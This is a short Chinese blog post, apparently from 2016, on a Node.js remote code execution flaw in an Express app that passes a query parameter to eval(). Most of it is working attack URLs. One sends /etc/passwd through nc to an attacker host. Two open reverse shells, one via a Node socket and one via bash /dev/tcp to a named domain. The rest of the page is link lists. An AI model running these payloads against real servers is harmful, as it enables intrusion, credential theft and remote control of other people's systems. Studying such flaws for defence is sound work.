首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
抛弃Nginx使用nodejs做反向代理服务器
Jul 17 NodeJs
nodejs 整合kindEditor实现图片上传
Feb 03 NodeJs
Jquery通过ajax请求NodeJS返回json数据实例
Nov 08 NodeJs
详解nodejs微信公众号开发——1.接入微信公众号
Apr 10 NodeJs
nodejs multer实现文件上传与下载
May 10 NodeJs
Nodejs中使用captchapng模块生成图片验证码
May 18 NodeJs
nodeJS实现路由功能实例代码
Jun 08 NodeJs
NodeJs通过async/await处理异步的方法
Oct 09 NodeJs
nodejs结合socket.io实现websocket通信功能的方法
Jan 12 NodeJs
nodejs中各种加密算法的实现详解
Jul 11 NodeJs
nodejs各种姿势断点调试的方法
Jun 18 NodeJs
用Nodejs实现在终端中炒股的实现
Oct 18 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
openEuler(1) reduce(2) SQLite3(1) Selenium(1) dockerfile(1) Django(9) TextInputLayout(1) filter(1) EditText(1) Tsmoothie(1)
You might like
php 错误处理经验分享
2011/10/11 PHP
php结合js实现点击超链接执行删除确认操作
2014/10/31 PHP
关于PHP转换超过2038年日期出错的问题解决
2017/06/28 PHP
php+mysql开发的最简单在线题库(在线做题系统)完整案例
2019/03/30 PHP
javascript中的对象和数组的应用技巧
2007/01/07 Javascript
Whatever:hover 无需javascript让IE支持丰富伪类
2010/06/29 Javascript
JQuery悬停控制图片轮播——代码简单
2015/08/05 Javascript
jQuery使用animate创建动画用法实例
2015/08/07 Javascript
jQuery AJAX timeout 超时问题详解
2016/06/21 Javascript
canvas实现动态小球重叠效果
2017/02/06 Javascript
JS 实现百度搜索功能
2018/02/01 Javascript
Vue Prop属性功能与用法实例详解
2019/02/23 Javascript
微信sdk实现禁止微信分享(使用原生php实现)
2019/11/15 Javascript
小程序实现tab标签页
2020/11/16 Javascript
跟老齐学Python之关于循环的小伎俩
2014/10/02 Python
Python实现的根据IP地址计算子网掩码位数功能示例
2018/05/23 Python
TensorFlow 滑动平均的示例代码
2018/06/19 Python
python中的常量和变量代码详解
2018/07/25 Python
Python数据类型之String字符串实例详解
2019/05/08 Python
django一对多模型以及如何在前端实现详解
2019/07/24 Python
python实现切割url得到域名、协议、主机名等各个字段的例子
2019/07/25 Python
PyTorch使用cpu加载模型运算方式
2020/01/13 Python
Python数组拼接np.concatenate实现过程
2020/04/18 Python
Python创建自己的加密货币的示例
2021/03/01 Python
英国赛车、汽车改装和摩托车零件购物网站:Demon Tweeks
2018/10/29 全球购物
解释一下ruby中的特殊方法与特殊类
2013/02/26 面试题
军训自我鉴定
2013/12/14 职场文书
运动会广播稿500字
2014/01/28 职场文书
开会迟到检讨书
2014/02/03 职场文书
物流管理专业毕业生自荐信
2014/03/04 职场文书
社区网格化管理实施方案
2014/03/21 职场文书
留学经费担保书
2014/05/12 职场文书
通知的格式范文
2015/04/27 职场文书
社区挂职锻炼个人工作总结
2015/10/23 职场文书
奖学金申请书(范文)
2019/08/14 职场文书
JavaScript展开运算符和剩余运算符的区别详解
2022/02/18 Javascript